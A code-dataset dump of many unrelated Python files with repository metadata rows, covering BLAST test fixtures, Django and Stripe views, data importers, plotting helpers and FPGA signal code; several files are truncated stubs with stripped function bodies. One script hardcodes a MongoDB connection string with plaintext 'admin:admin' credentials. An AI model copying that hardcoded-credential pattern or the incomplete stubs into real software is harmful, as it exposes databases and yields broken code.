'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Mummypox virus 3000 B.C.',
}
]
}
RECORD2 = {
'query': 'id2',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-6,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
# Identical to RECORD2, apart from e-value.
RECORD3 = {
'query': 'id3',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 20,
'sbjct_end': 1400,
'expect': 1e-5,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
RECORD4 = {
'query': 'id4',
'alignments': [
{
'length': 30000,
'hsps': [
{
'bits': 10,
'sbjct_end': 1400,
'expect': 1e-3,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 5,
'sbjct_end': 1400,
'expect': 1e-2,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
},
{
'bits': 3,
'sbjct_end': 1400,
'expect': 0.0,
'sbjct': 'TACCC--CGGCCCGCG-CGGCCGGCTCTCCA',
'sbjct_start': 1362,
'query': 'TACCCTGCGGCCCGCTACGGCTGG-TCTCCA',
'frame': [1, 1],
'query_end': 68,
'query_start': 28
}
],
'title': 'gi|887699|gb|DQ37780 Cowpox virus 15',
}
]
}
| 27.538153 | 70 | 0.392737 |
9fd7af8273e6b7e9744ade794d211dd5ee462f86 | 420 | py | Python | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2018-02-03T23:22:20.000Z | 2018-02-03T23:22:20.000Z | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2018-05-12T13:55:01.000Z | 2018-05-13T00:16:23.000Z | pyrigate/units/parse.py | pyrigate/pyrigate | 366e33ef46ebc7928cf35f2d51ed0855c59d1a68 | [
"MIT"
] | 1 | 2019-10-18T12:23:02.000Z | 2019-10-18T12:23:02.000Z | # -*- coding: utf-8 -*-
"""."""
import re
_UNIT_STRING_REGEX = r'^([0-9\.]+)(ml|cl|dl|l)$'
def parse_unit(unit_string):
"""."""
lower_unit_string = unit_string.lower()
match = re.match(_UNIT_STRING_REGEX, lower_unit_string)
if match:
try:
return float(match.group(1)), match.group(2)
except ValueError:
return None, None
else:
return None, None
| 18.26087 | 59 | 0.57381 |
9fd914093a9d2ec4b79940394bc875e521269c52 | 6,659 | py | Python | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | 2 | 2021-01-05T10:53:57.000Z | 2021-02-26T09:15:14.000Z | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | 3 | 2020-12-15T11:29:25.000Z | 2021-05-07T09:18:43.000Z | src/mhealth/data_analysis_tests/cross_correlator_test.py | hirsch-lab/mhealth | ad4287483cee206c7b8ff6216293f19d71296129 | [
"MIT"
] | null | null | null | import os
import glob
import unittest
from ..utils import testing
from ..utils import everion_keys
from ..utils.file_helper import FileHelper
from ..utils.data_aggregator import Normalization
from ..visualization.vis_properties import VisProperties
from ..data_analysis.cross_correlator import CrossCorrelator
_MHEALTH_DATA = os.getenv('MHEALTH_DATA', '../../resources')
_MHEALTH_OUT_DIR = os.path.join(_MHEALTH_DATA, 'output')
if __name__ == '__main__':
unittest.main()
| 44.691275 | 78 | 0.565851 |
9fd91ec0b1f55cd338e90af15b11bcbae0dc4915 | 1,471 | py | Python | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | 2 | 2022-03-02T11:59:19.000Z | 2022-03-18T17:59:28.000Z | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | 1 | 2022-03-03T14:07:19.000Z | 2022-03-03T14:07:19.000Z | neurgoo/misc/plot_utils.py | NISH1001/neurgoo | 83b2f4928d362b2b3c2f80ff6afe4c4768d6cc74 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from typing import Dict, List
try:
import matplotlib.pyplot as plt
MATPLOTLIB = True
except:
MATPLOTLIB = False
from loguru import logger
from .eval import EvalData
def plot_history(
history: Dict[str, List[EvalData]], plot_type="loss", figure_size=(20, 7)
) -> None:
"""
This function plots train/val metrics in the same figure.
"""
if not MATPLOTLIB:
logger.error("Maplotlib not installed. Halting the plot process!")
return
train = history.get("train", [])
val = history.get("val", [])
# get epoch data common to both
t_epochs = list(map(lambda e: e.epoch, train))
v_epochs = list(map(lambda e: e.epoch, val))
epochs = set(t_epochs).intersection(v_epochs)
train = filter(lambda e: e.epoch in epochs, train)
train = sorted(train, key=lambda e: e.epoch)
val = filter(lambda e: e.epoch in epochs, val)
val = sorted(val, key=lambda e: e.epoch)
plt.figure(figsize=figure_size)
plt.plot([getattr(data, plot_type) for data in train])
plt.plot([getattr(data, plot_type) for data in val])
plt.legend([f"Train {plot_type}", f"Val {plot_type}"])
plt.xlabel("epoch")
plt.ylabel(f"{plot_type}")
if __name__ == "__main__":
main()
| 23.349206 | 77 | 0.650578 |
9fdabb9fe3ddfe1efb0455a952de16d9ff31f05a | 3,277 | py | Python | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | LPSelectiveSearch.py | ksdsouza/license-plate-detector | 900a032768d9c623b7ecb1ec7abd07651fda2b16 | [
"MIT"
] | null | null | null | import itertools
import os
import sys
import cv2
import numpy as np
from SelectiveSearch import SelectiveSearch
images_path = "Images"
annotations = "Annotations"
cv2.setUseOptimized(True)
selective_search = SelectiveSearch()
train_images = []
train_labels = []
SS_IMG_SIZE = (224, 224)
# chunk = int(sys.argv[1])
# filenames = list(enumerate(
# f for f in os.listdir(annotations)
# if f.startswith('wts')
# ))[chunk * 20:(chunk + 1) * 20]
#
# for index, file in filenames:
# try:
# print(f"{index}\t{file}")
# boundary_box, img_filename = get_annotation(os.path.join(annotations, file))
# ss_results, img_out = selective_search.process_image(img_filename)
# lp_counter = 0
# bg_counter = 0
# fflag = False
# bflag = False
#
# for result in itertools.islice(ss_results, 2000):
# x1, y1, dx, dy = result
# if file.startswith('wts_textonly'):
# iou = 0
# else:
# iou = get_iou(boundary_box, {
# 'x1': x1,
# 'y1': y1,
# 'x2': x1 + dx,
# 'y2': y1 + dy
# })
# if bg_counter < 30:
# if iou < 0.3:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(0)
# bg_counter += 1
# else:
# bflag = True
# if lp_counter < 30:
# if iou > 0.85:
# test_image = img_out[y1: y1 + dy, x1:x1 + dx]
# resized = cv2.resize(test_image, SS_IMG_SIZE, interpolation=cv2.INTER_AREA)
# train_images.append(resized)
# train_labels.append(1)
# lp_counter += 1
# else:
# fflag = True
# if fflag and bflag:
# break
# except Exception as e:
# print(e)
# print(f"Error occurred in {file}")
#
# np.save(f'train_images_chunk{chunk}', train_images)
# np.save(f'train_labels_chunk{chunk}', train_labels)
| 30.06422 | 97 | 0.523039 |
9fdadafb759d17ded7ccd299bdbfcf9faeff04b7 | 66 | py | Python | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_18_exm_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | rx = re.compile(r'\b%s\b' % r'\b|\b'.join(map(re.escape, adict)))
| 33 | 65 | 0.575758 |
9fddbda4c3c7b498a0499af95d1e10c2e4bd8c81 | 233 | py | Python | projects/admin.py | kylef-archive/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | 2 | 2015-02-15T19:01:29.000Z | 2015-11-08T13:25:14.000Z | projects/admin.py | kylef/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | null | null | null | projects/admin.py | kylef/django-projects | 306043b7aea7a170adc70cb78844e039efc161d4 | [
"BSD-2-Clause"
] | 1 | 2021-08-02T19:08:29.000Z | 2021-08-02T19:08:29.000Z | from django.contrib import admin
from projects.models import Project
admin.site.register(Project, ProjectAdmin) | 29.125 | 45 | 0.751073 |
9fde09067036bce742f20360db8b7e67c431adac | 3,636 | py | Python | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | core/tests/test_office.py | cjmash/art-backend | fb1dfd69cca9cda1d8714bd7066c3920d1a97312 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.db import transaction
from rest_framework.exceptions import ValidationError
from ..models import OfficeBlock, OfficeFloor, OfficeFloorSection
from core.tests import CoreBaseTestCase
User = get_user_model()
| 37.484536 | 73 | 0.668592 |
9fdf686d8f768389a99935e8b0188491d6cb098b | 2,481 | py | Python | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 47 | 2016-04-21T19:51:17.000Z | 2022-02-25T14:13:30.000Z | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 421 | 2016-04-20T18:45:24.000Z | 2022-03-14T14:50:41.000Z | tests/functional/collection/test_collection_show.py | sirosen/temp-cli-test | 416fd3fea17b4c7c2cf35d6ccde63cb5719a1af6 | [
"Apache-2.0"
] | 20 | 2016-09-10T20:25:27.000Z | 2021-10-06T16:02:47.000Z | import pytest
| 36.485294 | 132 | 0.639258 |
9fdfc62d17a4273e27c2f11b9b40558a4ec8fe41 | 2,044 | py | Python | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | null | null | null | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | 2 | 2021-09-08T02:16:00.000Z | 2022-01-13T02:57:26.000Z | job.py | mapledyne/ihunttools | 28d4f7dbf61b6e3f34c9e1cdfdac2e9afec177d8 | [
"MIT"
] | null | null | null | import argparse
import random
import ihuntapp
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Build an #iHunt job app page.')
parser.add_argument('--name', "-n",
default="Unnamed job", help='Name of the job')
parser.add_argument('--description', "-d",
default="No description available", help='Description of the job')
parser.add_argument('--image', "-i",
type=str, default="", help='Job image', required=True)
parser.add_argument('--price', "-p",
default=(random.randint(1, 18) * 500), help='Price the job pays')
parser.add_argument('--stars', "-s",
type=float, default=(random.randint(3, 8) * 0.5), help='Star level of job')
parser.add_argument('--currency', default="$", help='Currency symbol')
parser.add_argument('--distance',
type=float, default=random.uniform(5, 25), help='Distance of job')
parser.add_argument('--distanceunit', default="miles", help='distance unit')
parser.add_argument('--time', "-t",
type=float, default=random.randint(1, 3), help='Time of post')
parser.add_argument('--timeunit', default="days", help='Time unit')
parser.add_argument('--remaining', "-r",
type=float, default=random.randint(3, 8), help='Time of post')
parser.add_argument('--remainingunit', default="days", help='Time unit')
parser.add_argument('--output', '-o', default='job.png', help='Filename to save screenshot')
args = parser.parse_args()
phone = ihuntapp.iHuntApp(args.name, args.description, args.image)
phone.price = args.price
phone.stars = args.stars
phone.currency = args.currency
phone.distance = args.distance
phone.distanceunit = args.distanceunit
phone.time = args.time
phone.timeunit = args.timeunit
phone.remaining = args.remaining
phone.remainingunit = args.remainingunit
phone.screenshot(args.output)
| 44.434783 | 99 | 0.626223 |
9fe154537630b5423fecebdaa0e5bc8b96aff771 | 4,945 | py | Python | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | category_import.py | iankigen/art-backend | e46f8e1a530ae56b6a236af4ff686ca4e0dd6630 | [
"MIT"
] | null | null | null | import sys
import os
import csv
from tqdm import tqdm
import django
from import_util import display_inserted, display_skipped
project_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(project_dir)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
django.setup()
from core.models.asset import AssetCategory, AssetSubCategory # noqa
if __name__ == '__main__':
print('********* Import the csv file ********')
input_file = input('Import the file: ')
load_csv_file(input_file) # noqa
| 44.151786 | 79 | 0.394944 |
9fe1fc1239cc234d72923d2663fd719390f1395d | 454 | py | Python | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | 4 | 2021-09-10T19:20:42.000Z | 2022-02-12T00:27:40.000Z | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | null | null | null | epochbot/utils.py | jaloo555/solana-easy-py | 8e28b8de52fbe4ee0b8e94a0f9c728114fc91728 | [
"MIT"
] | 1 | 2021-11-08T15:32:46.000Z | 2021-11-08T15:32:46.000Z |
ENDPOINT_URLS_ENUM = enum(
MAIN='https://api.mainnet-beta.solana.com',
DEV='https://api.devnet.solana.com',
TEST='https://api.testnet.solana.com',
)
ENDPOINT_URLS = {
"MAIN":'https://api.mainnet-beta.solana.com',
"DEV":'https://api.devnet.solana.com',
"TEST":'https://api.testnet.solana.com',
} | 30.266667 | 66 | 0.645374 |
9fe207c6dcc8198ff87d2e16175a87d21e6112ea | 812 | py | Python | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | null | null | null | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | 1 | 2021-11-13T10:12:49.000Z | 2021-11-16T12:17:01.000Z | FrontEnd/mapa_pontos.py | JessicaIsri/WebBot | e9ed911c0306f5e362b577e244e50073336480ea | [
"bzip2-1.0.6"
] | null | null | null | import pymongo
import folium
from pymongo import MongoClient
db = MongoClient('mongodb+srv://admin:admin@cluster0-vuh1j.azure.mongodb.net/test?retryWrites=true&w=majority')
db = db.get_database('BD_EMPRESAS')
collection = db.empresas
cnpj = []
latitude = []
longitude = []
qtd_range = []
endereco = []
cnpj = db.get_collection('empresas').distinct("cnpj")
latitude = db.get_collection('empresas').distinct("latitude")
qtd_range = len(latitude)
longitude = db.get_collection('empresas').distinct("longitude")
endereco = db.get_collection('empresas').distinct("endereco")
mapa = folium.Map(location=[-23.4795233,-46.2698754],zoom_start=9)
for i in range(qtd_range):
folium.Marker([latitude[i], longitude[i]], popup='CNPJ: '+cnpj[i]+'\n Endereco: '+endereco[i]).add_to(mapa)
mapa.save("index.html") | 24.606061 | 111 | 0.730296 |
9fe282030a02b4055f9395a841b3fabbcbf1b05f | 835 | py | Python | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null | tests/test_BG_IO.py | GeorgRamer/anasys-python-tools | f4fbb83b7df8f6b2fefac3fb5e478076fcea7cfa | [
"MIT"
] | null | null | null |
import anasyspythontools as apt
import pytest
import glob
import os
TESTFOLDER = os.path.join(os.path.dirname(__file__),"test data")
| 23.194444 | 83 | 0.646707 |
9fe2e87d337b6c88bd8c4467d12c5b714809bf62 | 1,015 | py | Python | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null | afpy/yml.py | fordaj/afpy | 4fca208a186d276a28e7911210cedb02033237b0 | [
"MIT"
] | null | null | null |
import yaml
from yaml import Loader, Dumper
from .pathify import * | 30.757576 | 86 | 0.487685 |
9fe326bc9f4e12d04244fe6f4b5e92ea0f66a315 | 88 | py | Python | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 1 | 2021-10-01T05:54:02.000Z | 2021-10-01T05:54:02.000Z | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 7 | 2021-09-21T11:38:50.000Z | 2021-10-06T10:28:11.000Z | Algorithm/__init__.py | DSC-Bennett-University/AI-ML-Starter | 5dc411c686a703c37eaf7e88db184cb8972ad2d1 | [
"MIT"
] | 4 | 2021-09-21T12:08:05.000Z | 2021-10-01T05:54:08.000Z | from .template import template
from .tools import tools
from .LinearReg import LinearReg | 29.333333 | 32 | 0.840909 |
9fe3746b0ca2a17a4da60916603ceccce096325e | 6,994 | py | Python | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 1,080 | 2020-06-22T07:44:22.000Z | 2022-03-22T07:46:48.000Z | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 24 | 2020-08-06T02:06:37.000Z | 2022-03-31T03:34:35.000Z | hypernets/tests/searchers/evolution_test.py | Enpen/Hypernets | 5fbf01412ffaef310855d98f52f8cc169e96246b | [
"Apache-2.0"
] | 170 | 2020-08-14T08:39:18.000Z | 2022-03-23T12:58:17.000Z | # -*- coding:utf-8 -*-
"""
"""
import numpy as np
from hypernets.core.ops import Identity
from hypernets.core.search_space import HyperSpace, Int, Real, Choice, Bool
from hypernets.core.searcher import OptimizeDirection
from hypernets.searchers.evolution_searcher import Population, EvolutionSearcher
| 39.965714 | 120 | 0.570489 |
9fe3efc076ac50b9a73eb652fb87630b07aba672 | 286 | py | Python | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | 67 | 2018-10-02T04:04:15.000Z | 2022-03-30T17:43:56.000Z | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | null | null | null | backend/api/api.py | iamdempa/react-flask-postgres-boilerplate-with-docker | f1d74dfa08777ff2aeef3ed2620087855d6e30c3 | [
"Apache-2.0"
] | 30 | 2018-11-21T22:55:08.000Z | 2022-03-01T16:55:53.000Z | from flask import jsonify
from flask_restful import Resource, Api
from .models import Player as PlayerModel, to_dict
api = Api()
api.add_resource(Player, '/')
| 22 | 79 | 0.734266 |
9fe5a28b405ba0411a5720a42bbe49f07b08a96f | 8,697 | py | Python | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | core/data/collators.py | manzar96/st7 | 8dac6fa3497e5a3594766a232a9e8436120e9563 | [
"MIT"
] | null | null | null | import torch
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence
from core.utils.masks import pad_mask, subsequent_mask
from core.utils.tensors import mktensor
| 33.321839 | 77 | 0.609176 |
9fe62e0a759bb38c6001a97c2d2f6695ebbb34cb | 22,748 | py | Python | tests/filesystem_tests.py | d-kiss/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | 1 | 2017-10-09T10:59:43.000Z | 2017-10-09T10:59:43.000Z | tests/filesystem_tests.py | d-kiss/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | 5 | 2017-10-06T17:33:37.000Z | 2017-10-13T16:31:34.000Z | tests/filesystem_tests.py | rinslow/fakeos | 88dff667830efe10841df8b3a5f33a581bd94b69 | [
"MIT"
] | null | null | null | import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
| 33.403818 | 86 | 0.583656 |
9fe6a6466ba62d142e4c8d8e39066315eacdcdb4 | 6,129 | py | Python | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | 1 | 2020-03-02T22:26:44.000Z | 2020-03-02T22:26:44.000Z | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | null | null | null | ceed/utils.py | matham/ceed | 5d32a99a33325b36dbe74d8b0a22e63abc92aab7 | [
"MIT"
] | 2 | 2020-01-13T19:42:16.000Z | 2020-01-27T14:58:09.000Z | """Utilities
===================
Various tools used in :mod:`ceed`.
"""
import re
import pathlib
from collections import deque
from typing import List, Tuple, Any, Union
__all__ = (
'fix_name', 'update_key_if_other_key', 'collapse_list_to_counts',
'get_plugin_modules', 'CeedWithID',
)
_name_pat = re.compile('^(.+)-([0-9]+)$')
def fix_name(name, *names):
"""Fixes the name so that it is unique among the names in ``names``.
:Params:
`name`: str
A name of something
`*names`: iterables of strings
Positional argument, where each is a iterable of strings among
which we ensure that the returned name is unique.
:returns:
A string that is unique among all the ``names``, but is similar to
``name``. We append a integer to make it unique.
E.g.::
>>> fix_name('troll', ['toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'toll', 'foll'], ['bole', 'cole'])
'troll-2'
>>> fix_name('troll', ['troll-2', 'toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'troll-2', 'toll', 'foll'], \
['bole', 'cole'])
'troll-3'
"""
if not any((name in n for n in names)):
return name
m = re.match(_name_pat, name)
i = 2
if m is not None:
name, i = m.groups()
i = int(i)
new_name = '{}-{}'.format(name, i)
while any((new_name in n for n in names)):
i += 1
new_name = '{}-{}'.format(name, i)
return new_name
def update_key_if_other_key(items, key, value, other_key, key_map):
"""Given a dict, or list/tuple of dicts (recursively), it goes through all
the dicts and updates the keys who match.
Specifically, if a key matches ``key``, its value matches ``value``,
there's another key named ``other_key`` in the dict, and the ``value`` of
``other_key`` is in ``key_map``, then the value of ``other_key`` is
updated to that value from ``key_map``.
"""
for item in items:
if isinstance(item, dict):
if key in item and item[key] == value and other_key in item:
item[other_key] = key_map.get(item[other_key], item[other_key])
update_key_if_other_key(
item.values(), key, value, other_key, key_map)
elif isinstance(item, (list, tuple)):
update_key_if_other_key(item, key, value, other_key, key_map)
def collapse_list_to_counts(values: list) -> List[Tuple[Any, int]]:
"""Converts a sequence of items to tuples of the item and count of
sequential items.
E.g.::
>>> collapse_list_to_counts([1, 1, 2, 3, 1, 1, 1, 3,])
[(1, 2), (2, 1), (3, 1), (1, 3), (3, 1)]
"""
counter = None
last_item = object()
res = []
for value in values:
if value != last_item:
if counter is not None:
res.append((last_item, counter))
last_item = value
counter = 1
else:
counter += 1
if counter is not None:
# we saw some items at least, the last was not added
res.append((last_item, counter))
return res
def get_plugin_modules(
base_package: str, root: Union[str, pathlib.Path]
) -> Tuple[List[str], List[Tuple[Tuple[str], bytes]]]:
"""Takes a package name and it's corresponding root path and returns a list
of the modules recursively within this package, as well as the source files
in bytes.
Only ``*.py`` files are considered, and although included with the source
bytes, the ``packages`` list skips any files that start with a underscore
(except ``__init__.py`` of course).
"""
packages = []
files = []
fifo = deque([pathlib.Path(root)])
while fifo:
directory = fifo.popleft()
relative_dir = directory.relative_to(root)
directory_mod = '.'.join((base_package,) + relative_dir.parts)
for item in directory.iterdir():
if item.is_dir():
if not item.name == '__pycache__':
fifo.append(item)
continue
if not item.is_file() or not item.name.endswith(('.py', '.pyo')):
continue
# only pick one of pyo/py
if item.suffix == '.pyo' and item.with_suffix('.py').exists():
continue
files.append(
(relative_dir.parts + (item.name, ), item.read_bytes()))
if item.name.startswith('_') and item.name != '__init__.py' \
and item.name != '__init__.pyo':
continue
name = item.name[:-3]
if name == '__init__':
package = directory_mod
else:
package = f'{directory_mod}.{name}'
packages.append(package)
return packages, files
| 32.775401 | 81 | 0.565019 |
9fe8653449fbc6e6fa94b10d1d0a857bd0455ebf | 2,341 | py | Python | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | 1 | 2022-01-22T13:43:30.000Z | 2022-01-22T13:43:30.000Z | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | null | null | null | gumroad_clone/users/views.py | AlexanderTCHK/gumroad-clone | 39654243e581b918569772e410196557f71f6591 | [
"MIT"
] | null | null | null | import stripe
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, TemplateView
from stripe.api_resources import account_link
User = get_user_model()
stripe.api_key = settings.STRIPE_SECRET_KEY
user_detail_view = UserDetailView.as_view()
user_update_view = UserUpdateView.as_view()
user_redirect_view = UserRedirectView.as_view() | 29.2625 | 83 | 0.720632 |
9fe92dc5882b9ab766bfa49539001ca33aa51f84 | 510 | py | Python | chapter1/quest1_4.py | mag6367/Coding_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | 1 | 2017-04-28T13:52:13.000Z | 2017-04-28T13:52:13.000Z | chapter1/quest1_4.py | mag6367/Cracking_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | null | null | null | chapter1/quest1_4.py | mag6367/Cracking_the_Coding_Interview_Python_Solutions | 1d97d18d3d9732c25626e20cb3561ce4241b16e8 | [
"MIT"
] | null | null | null | # question 1.4 from cracking the code interview 4th ed.
'''
Write a method to decide if two strings are anagrams or not.
'''
# if we sort the two string, they should be the same
| 24.285714 | 60 | 0.727451 |
9febad62a52cd187ba14dbd7516dbb4c9c77a4fc | 2,516 | py | Python | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 14 | 2020-02-16T15:36:31.000Z | 2022-03-27T02:24:40.000Z | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 1 | 2020-11-23T16:16:33.000Z | 2020-11-23T16:16:33.000Z | firmware/measure_magnitude.py | mfkiwl/OpenXcvr | 9bea6efd03cd246f16982f0fadafed684ac5ce1c | [
"MIT"
] | 4 | 2021-03-29T16:55:03.000Z | 2022-01-23T16:43:59.000Z | from baremetal import *
from baremetal.signed import number_of_bits_needed
from settings import Settings
from math import log, pi
from matplotlib import pyplot as plt
import numpy as np
import sys
from math import log, ceil
from numpy import log10
#settings for 100KS/s
# hang attack decay
# fast 10000(100ms) 4(1ms) 10(62.5ms)
# med 25000(250ms) 4(1ms) 12(250ms)
# slow 100000(1s) 4(1ms) 13(500ms)
# long 200000(2s) 4(1ms) 15(2s)
if __name__ == "__main__" and "sim" in sys.argv:
settings = Settings()
settings.agc_frame_size = 100
settings.agc_frames = 4
clk = Clock("clk")
data_in = Signed(16).input("data_in")
stb_in = Boolean().input("stb_in")
magnitude = measure_magnitude(clk, data_in, stb_in, 0, 0)
stimulus = []
for i in range(1000):
stimulus.append(100)
for i in range(20000):
stimulus.append(0)
response = []
#simulate
clk.initialise()
i = 0
for data in stimulus:
